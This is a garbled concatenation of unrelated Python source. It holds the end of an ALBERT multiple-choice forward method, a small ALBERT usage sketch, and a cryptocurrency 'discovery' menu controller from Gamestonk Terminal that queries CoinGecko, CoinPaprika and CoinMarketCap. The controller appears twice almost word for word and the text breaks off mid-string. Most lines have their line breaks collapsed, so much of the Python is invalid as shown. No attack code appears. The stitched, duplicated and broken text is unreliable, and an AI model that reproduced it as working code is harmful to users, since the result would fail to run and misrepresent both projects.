(see `input_ids` above) """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1] input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None inputs_embeds = ( inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1)) if inputs_embeds is not None else None ) outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) reshaped_logits = logits.view(-1, num_choices) loss = None if labels is not None: loss_fct = CrossEntropyLoss() loss = loss_fct(reshaped_logits, labels) if not return_dict: output = (reshaped_logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return MultipleChoiceModelOutput( loss=loss, logits=reshaped_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, )
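# ---------------------------------------------------------------------------
# Minimal usage sketch for the ALBERT classes defined above. It is illustrative
# only: it assumes `torch` and `AlbertConfig` are already in scope at module
# level (both are referenced above), and it builds a deliberately tiny,
# randomly initialized configuration so the forward pass runs without any
# pretrained checkpoint or network access.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    # Tiny configuration: 2 layers sharing a single hidden group, small sizes.
    tiny_config = AlbertConfig(
        vocab_size=100,
        embedding_size=16,
        hidden_size=32,
        num_hidden_layers=2,
        num_hidden_groups=1,
        num_attention_heads=4,
        intermediate_size=64,
        max_position_embeddings=64,
    )

    model = AlbertModel(tiny_config)
    model.eval()

    # Batch of 2 sequences, 10 tokens each, drawn at random from the toy vocab.
    input_ids = torch.randint(0, tiny_config.vocab_size, (2, 10))
    attention_mask = torch.ones_like(input_ids)

    with torch.no_grad():
        outputs = model(input_ids=input_ids, attention_mask=attention_mask)

    # last_hidden_state: (batch, seq_len, hidden_size); pooler_output: (batch, hidden_size)
    print(outputs.last_hidden_state.shape, outputs.pooler_output.shape)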
"""Cryptocurrency Discovery Controller""" __docformat__ = "numpy" # pylint: disable=R0904, C0302, W0622, C0201 import argparse import difflib from typing import List, Union from prompt_toolkit.completion import NestedCompleter from gamestonk_terminal import feature_flags as gtff from gamestonk_terminal.helper_funcs import ( EXPORT_ONLY_RAW_DATA_ALLOWED, get_flair, parse_known_args_and_warn, check_positive, try_except, system_clear, ) from gamestonk_terminal.menu import session from gamestonk_terminal.cryptocurrency.discovery import ( coinmarketcap_model, coinpaprika_model, pycoingecko_model, pycoingecko_view, coinpaprika_view, coinmarketcap_view, ) from gamestonk_terminal.cryptocurrency.crypto_controller import CRYPTO_SOURCES from gamestonk_terminal.cryptocurrency import cryptocurrency_helpers class DiscoveryController: """Discovery Controller class""" CHOICES = [ "cls", "home", "h", "?", "help", "q", "quit", "..", "exit", "r", "reset", ] CHOICES_COMMANDS = [ "coins", "cpsearch", "cmctop", "cgtrending", "cgvoted", "cgvisited", "cgvolume", "cgrecently", "cgsentiment", "cggainers", "cglosers", "cgyfarms", "cgdefi", "cgdex", "cgnft", ] CHOICES += CHOICES_COMMANDS def __init__(self, queue: List[str] = None): """CONSTRUCTOR""" self.discovery_parser = argparse.ArgumentParser(add_help=False, prog="disc") self.discovery_parser.add_argument("cmd", choices=self.CHOICES) self.completer: Union[None, NestedCompleter] = None if session and gtff.USE_PROMPT_TOOLKIT: choices: dict = {c: {} for c in self.CHOICES} choices["coins"]["--source"] = {c: {} for c in CRYPTO_SOURCES.keys()} choices["cggainers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cggainers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cglosers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cglosers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cgtrending"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvoted"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvisited"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgsentiment"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgrecently"]["-s"] = { c: {} for c in pycoingecko_model.RECENTLY_FILTERS } choices["cgyfarms"]["-s"] = { c: {} for c in pycoingecko_model.YFARMS_FILTERS } choices["cgvolume"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdefi"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgnft"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdex"]["-s"] = {c: {} for c in pycoingecko_model.DEX_FILTERS} choices["cmctop"]["-s"] = {c: {} for c in coinmarketcap_model.FILTERS} choices["cpsearch"]["-s"] = {c: {} for c in coinpaprika_model.FILTERS} choices["cpsearch"]["-c"] = {c: {} for c in coinpaprika_model.CATEGORIES} self.completer = NestedCompleter.from_nested_dict(choices) if queue: self.queue = queue else: self.queue = list() def print_help(self): """Print help""" help_text = """ Discovery Menu: Overview: coins search for coins on CoinGecko, Binance, CoinPaprika CoinGecko: cgtrending trending coins on CoinGecko cgvoted most voted coins on CoinGecko cgvisited most visited coins on CoinGecko cgvolume coins with highest volume on CoinGecko cgrecently recently added on CoinGecko cgsentiment coins with most positive sentiment cggainers top gainers - coins which price gained the most in given period cglosers top losers - coins which price 
dropped the most in given period cgyfarms top yield farms cgdefi top defi protocols cgdex top decentralized exchanges cgnft top non fungible tokens CoinPaprika: cpsearch search on CoinPaprika CoinMarketCap: cmctop top coins from CoinMarketCap """ print(help_text) def switch(self, an_input: str): """Process and dispatch input Parameters ------- an_input : str string with input arguments Returns ------- List[str] List of commands in the queue to execute """ # Empty command if not an_input: print("") return self.queue # Navigation slash is being used if "/" in an_input: actions = an_input.split("/") # Absolute path is specified if not actions[0]: an_input = "home" # Relative path so execute first instruction else: an_input = actions[0] # Add all instructions to the queue for cmd in actions[1:][::-1]: if cmd: self.queue.insert(0, cmd) (known_args, other_args) = self.discovery_parser.parse_known_args( an_input.split() ) # Redirect commands to their correct functions if known_args.cmd: if known_args.cmd in ("..", "q"): known_args.cmd = "quit" elif known_args.cmd in ("?", "h"): known_args.cmd = "help" elif known_args.cmd == "r": known_args.cmd = "reset" getattr( self, "call_" + known_args.cmd, lambda _: "Command not recognized!", )(other_args) return self.queue def call_cls(self, _): """Process cls command""" system_clear() def call_home(self, _): """Process home command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_help(self, _): """Process help command""" self.print_help() def call_quit(self, _): """Process quit menu command""" print("") self.queue.insert(0, "quit") def call_exit(self, _): """Process exit terminal command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_reset(self, _): """Process reset command""" self.queue.insert(0, "disc") self.queue.insert(0, "crypto") self.queue.insert(0, "reset") self.queue.insert(0, "quit") self.queue.insert(0, "quit") @try_except def call_coins(self, other_args): """Process coins command""" parser = argparse.ArgumentParser( prog="coins", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows list of coins available on CoinGecko, CoinPaprika and Binance.If you provide name of coin then in result you will see ids of coins with best match for all mentioned services. If you provide ALL keyword in your search query, then all coins will be displayed. To move over coins you can use pagination mechanism with skip, top params. E.g. coins ALL --skip 100 --limit 30 then all coins from 100 to 130 will be displayed. By default skip = 0, limit = 10. If you won't provide source of the data everything will be displayed (CoinGecko, CoinPaprika, Binance). If you want to search only in given source then use --source flag. E.g. 
if you want to find coin with name uniswap on CoinPaprika then use: coins uniswap --source cp --limit 10 """, ) parser.add_argument( "-c", "--coin", help="Coin you search for", dest="coin", required="-h" not in other_args, type=str, ) parser.add_argument( "-s", "--skip", default=0, dest="skip", help="Skip n of records", type=check_positive, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "--source", dest="source", help="Source of data.", type=str, choices=CRYPTO_SOURCES.keys(), ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-c") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: cryptocurrency_helpers.display_all_coins( coin=ns_parser.coin, source=ns_parser.source, top=ns_parser.limit, skip=ns_parser.skip, show_all=bool("ALL" in other_args), export=ns_parser.export, ) @try_except def call_cggainers(self, other_args): """Process gainers command""" parser = argparse.ArgumentParser( prog="cggainers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Gainers - coins which gain the most in given period. You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to set it to sort descending. There is --urls flag, which will display one additional column you all urls for coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_gainers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cglosers(self, other_args): """Process losers command""" parser = argparse.ArgumentParser( prog="cglosers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Losers - coins which price dropped the most in given period You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. 
""", ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_losers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgtrending(self, other_args): """Process trending command""" parser = argparse.ArgumentParser( prog="cgtrending", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover trending coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. trending will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="trending", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvoted(self, other_args): """Process voted command""" parser = argparse.ArgumentParser( prog="cgvoted", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover most voted coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. voted will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. 
Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_voted", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgrecently(self, other_args): """Process recently command""" parser = argparse.ArgumentParser( prog="cgrecently", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows recently added coins on CoinGecko. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Added with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.RECENTLY_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_recently_added( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvisited(self, other_args): """Process most_visited command""" parser = argparse.ArgumentParser( prog="cgvisited", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover most visited coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. visited will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. 
"""Cryptocurrency Discovery Controller""" __docformat__ = "numpy" # pylint: disable=R0904, C0302, W0622, C0201 import argparse import difflib from typing import List, Union from prompt_toolkit.completion import NestedCompleter from gamestonk_terminal import feature_flags as gtff from gamestonk_terminal.helper_funcs import ( EXPORT_ONLY_RAW_DATA_ALLOWED, get_flair, parse_known_args_and_warn, check_positive, try_except, system_clear, ) from gamestonk_terminal.menu import session from gamestonk_terminal.cryptocurrency.discovery import ( coinmarketcap_model, coinpaprika_model, pycoingecko_model, pycoingecko_view, coinpaprika_view, coinmarketcap_view, ) from gamestonk_terminal.cryptocurrency.crypto_controller import CRYPTO_SOURCES from gamestonk_terminal.cryptocurrency import cryptocurrency_helpers class DiscoveryController: """Discovery Controller class""" CHOICES = [ "cls", "home", "h", "?", "help", "q", "quit", "..", "exit", "r", "reset", ] CHOICES_COMMANDS = [ "coins", "cpsearch", "cmctop", "cgtrending", "cgvoted", "cgvisited", "cgvolume", "cgrecently", "cgsentiment", "cggainers", "cglosers", "cgyfarms", "cgdefi", "cgdex", "cgnft", ] CHOICES += CHOICES_COMMANDS def __init__(self, queue: List[str] = None): """CONSTRUCTOR""" self.discovery_parser = argparse.ArgumentParser(add_help=False, prog="disc") self.discovery_parser.add_argument("cmd", choices=self.CHOICES) self.completer: Union[None, NestedCompleter] = None if session and gtff.USE_PROMPT_TOOLKIT: choices: dict = {c: {} for c in self.CHOICES} choices["coins"]["--source"] = {c: {} for c in CRYPTO_SOURCES.keys()} choices["cggainers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cggainers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cglosers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cglosers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cgtrending"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvoted"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvisited"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgsentiment"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgrecently"]["-s"] = { c: {} for c in pycoingecko_model.RECENTLY_FILTERS } choices["cgyfarms"]["-s"] = { c: {} for c in pycoingecko_model.YFARMS_FILTERS } choices["cgvolume"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdefi"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgnft"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdex"]["-s"] = {c: {} for c in pycoingecko_model.DEX_FILTERS} choices["cmctop"]["-s"] = {c: {} for c in coinmarketcap_model.FILTERS} choices["cpsearch"]["-s"] = {c: {} for c in coinpaprika_model.FILTERS} choices["cpsearch"]["-c"] = {c: {} for c in coinpaprika_model.CATEGORIES} self.completer = NestedCompleter.from_nested_dict(choices) if queue: self.queue = queue else: self.queue = list() def print_help(self): """Print help""" help_text = """ Discovery Menu: Overview: coins search for coins on CoinGecko, Binance, CoinPaprika CoinGecko: cgtrending trending coins on CoinGecko cgvoted most voted coins on CoinGecko cgvisited most visited coins on CoinGecko cgvolume coins with highest volume on CoinGecko cgrecently recently added on CoinGecko cgsentiment coins with most positive sentiment cggainers top gainers - coins which price gained the most in given period cglosers top losers - coins which price 
dropped the most in given period cgyfarms top yield farms cgdefi top defi protocols cgdex top decentralized exchanges cgnft top non fungible tokens CoinPaprika: cpsearch search on CoinPaprika CoinMarketCap: cmctop top coins from CoinMarketCap """ print(help_text) def switch(self, an_input: str): """Process and dispatch input Parameters ------- an_input : str string with input arguments Returns ------- List[str] List of commands in the queue to execute """ # Empty command if not an_input: print("") return self.queue # Navigation slash is being used if "/" in an_input: actions = an_input.split("/") # Absolute path is specified if not actions[0]: an_input = "home" # Relative path so execute first instruction else: an_input = actions[0] # Add all instructions to the queue for cmd in actions[1:][::-1]: if cmd: self.queue.insert(0, cmd) (known_args, other_args) = self.discovery_parser.parse_known_args( an_input.split() ) # Redirect commands to their correct functions if known_args.cmd: if known_args.cmd in ("..", "q"): known_args.cmd = "quit" elif known_args.cmd in ("?", "h"): known_args.cmd = "help" elif known_args.cmd == "r": known_args.cmd = "reset" getattr( self, "call_" + known_args.cmd, lambda _: "Command not recognized!", )(other_args) return self.queue def call_cls(self, _): """Process cls command""" system_clear() def call_home(self, _): """Process home command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_help(self, _): """Process help command""" self.print_help() def call_quit(self, _): """Process quit menu command""" print("") self.queue.insert(0, "quit") def call_exit(self, _): """Process exit terminal command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_reset(self, _): """Process reset command""" self.queue.insert(0, "disc") self.queue.insert(0, "crypto") self.queue.insert(0, "reset") self.queue.insert(0, "quit") self.queue.insert(0, "quit") @try_except def call_coins(self, other_args): """Process coins command""" parser = argparse.ArgumentParser( prog="coins", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows list of coins available on CoinGecko, CoinPaprika and Binance.If you provide name of coin then in result you will see ids of coins with best match for all mentioned services. If you provide ALL keyword in your search query, then all coins will be displayed. To move over coins you can use pagination mechanism with skip, top params. E.g. coins ALL --skip 100 --limit 30 then all coins from 100 to 130 will be displayed. By default skip = 0, limit = 10. If you won't provide source of the data everything will be displayed (CoinGecko, CoinPaprika, Binance). If you want to search only in given source then use --source flag. E.g. 
if you want to find coin with name uniswap on CoinPaprika then use: coins uniswap --source cp --limit 10 """, ) parser.add_argument( "-c", "--coin", help="Coin you search for", dest="coin", required="-h" not in other_args, type=str, ) parser.add_argument( "-s", "--skip", default=0, dest="skip", help="Skip n of records", type=check_positive, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "--source", dest="source", help="Source of data.", type=str, choices=CRYPTO_SOURCES.keys(), ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-c") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: cryptocurrency_helpers.display_all_coins( coin=ns_parser.coin, source=ns_parser.source, top=ns_parser.limit, skip=ns_parser.skip, show_all=bool("ALL" in other_args), export=ns_parser.export, ) @try_except def call_cggainers(self, other_args): """Process gainers command""" parser = argparse.ArgumentParser( prog="cggainers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Gainers - coins which gain the most in given period. You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to set it to sort descending. There is --urls flag, which will display one additional column you all urls for coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_gainers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cglosers(self, other_args): """Process losers command""" parser = argparse.ArgumentParser( prog="cglosers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Losers - coins which price dropped the most in given period You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. 
""", ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_losers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgtrending(self, other_args): """Process trending command""" parser = argparse.ArgumentParser( prog="cgtrending", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover trending coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. trending will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="trending", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvoted(self, other_args): """Process voted command""" parser = argparse.ArgumentParser( prog="cgvoted", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover most voted coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. voted will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. 
Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_voted", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgrecently(self, other_args): """Process recently command""" parser = argparse.ArgumentParser( prog="cgrecently", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows recently added coins on CoinGecko. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Added with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.RECENTLY_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_recently_added( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvisited(self, other_args): """Process most_visited command""" parser = argparse.ArgumentParser( prog="cgvisited", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover most visited coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. visited will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. 
